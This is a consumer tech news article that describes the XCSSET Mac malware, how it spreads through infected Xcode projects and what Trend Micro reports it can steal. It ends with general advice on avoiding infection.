What Mac Users Should Know About the New ‘XCSSET’ Malware

What Mac Users Should Know About the New ‘XCSSET’ Malware

If you’re a Mac developer, or you like to try out new apps by building Xcode projects, there’s a serious strain of malware you need to be aware of: XCSSET.

Cybersecurity firm Trend Micro published a report detailing how attackers can use XCSSET to take over a user’s browser and steal their personal data, account passwords, and saved payment information. But it’s not just the attack’s potential severity that makes this malware so serious; it’s also the novel way it sneaks onto a user’s device.

XCSSET is installed via a trojan that hides in Xcode projects. For those who don’t know, Xcode is a free development tool used to create Apple apps on Mac, and Xcode projects are turned into the apps you run on your devices through a process called “building.”

When a developer builds an app from an infected Xcode project, the trojan quietly runs malicious code that installs XCSSET onto the developer’s system. Trends Micro says it’s unclear where these modified projects originate, but developers could be unwittingly distributing XCSSET by sharing Xcode projects without realising they’re infected.

Despite the immediate threat to developers, general users are also at risk. Many open-source Mac apps are distributed as buildable Xcode projects that users can download and build themselves — and once the trojan runs, it’s game over, man.

How bad is XCSSET?

Here’s everything XCSSET does once its installed, according to Trend Micro’s report:

  • Uses a vulnerability to read and dump Safari cookies
  • Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack
  • It steals information from the user’s Evernote, Notes, Skype, Telegram, QQ ,and WeChat apps
  • It takes screenshots of the user’s current screen
  • It uploads files from the affected machines to the attacker’s specified server
  • It encrypts files and shows a ransom note, if commanded by the server

Trend Micro also says the malware’s “UXSS” attack is theoretically able to take over the user’s web browser in numerous ways, including:

  • Modifying displayed websites
  • Modifying /replacing Bitcoin/cryptocurrency addresses
  • Stealing amoCRM, Apple ID, Google, Paypal, SIPMarket, and Yandex credentials
  • Stealing credit card information from the Apple Store
  • Blocking the user from changing passwords but also stealing newly modified passwords
  • Capturing screenshots of certain accessed sites

How to avoid the XCSSET Mac malware

The XCSSET malware is scary — and devilishly clever — but it’s mostly avoidable for regular users. Only download apps from official app stores and other verified sources, and use comprehensive anti-malware software. Yes, even on your Mac.

Developers should be cautious of how and where they’re sharing and accessing Xcode projects. However, since it’s difficult to spot the modified project files and no one is quite sure where the trojan originates, it’s possible that even legitimate, trusted sources could be compromised. Still, you should stick with those trusted sources nonetheless. For those interested, Trend Micro’s report includes a technical brief that explains how XCSSET works, which may help you keep your projects safe.

Log in to comment on this story!